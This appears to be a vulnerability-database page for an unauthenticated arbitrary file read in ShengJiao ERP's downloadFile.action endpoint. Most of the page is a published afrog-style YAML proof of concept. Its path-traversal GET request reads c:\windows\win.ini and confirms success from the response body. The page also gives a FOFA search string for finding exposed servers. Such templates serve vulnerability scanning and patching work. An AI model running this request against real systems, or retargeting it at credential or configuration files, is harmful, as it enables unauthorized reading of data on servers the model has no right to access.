shengjiao-erp-downloadfile-fileread: ShengJiao ERP downloadFile.action Arbitrary File Read

日期: 2025-09-01 | 影响软件: ShengJiao ERP | POC: 已公开

漏洞描述

ShengJiao ERP System downloadFile.action has an arbitrary file read vulnerability. Unauthenticated attackers can exploit this vulnerability to read important system files. FOFA: app="圣乔-ERP系统"

PoC代码[已公开]

id: shengjiao-erp-downloadfile-fileread
info:
  name: ShengJiao ERP downloadFile.action Arbitrary File Read
  author: ZacharyZcR
  severity: high
  verified: false
  description: |
    ShengJiao ERP System downloadFile.action has an arbitrary file read vulnerability.
    Unauthenticated attackers can exploit this vulnerability to read important system files.
    FOFA: app="圣乔-ERP系统"
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%9C%A3%E4%B9%94ERP/%E5%9C%A3%E4%B9%94ERP%E7%B3%BB%E7%BB%9FdownloadFile.action%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: shengqiao,erp,lfi,fileread
  created: 2024/12/31

rules:
  r0:
    request:
      method: GET
      path: /erp/wap/../downloadFile.action?absolutePath=true&file=c:\\windows\\win.ini
    expression: response.status == 200 && response.body.bcontains(b'for 16-bit app support')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/shengjiao-erp-downloadfile-fileread.yaml

相关漏洞推荐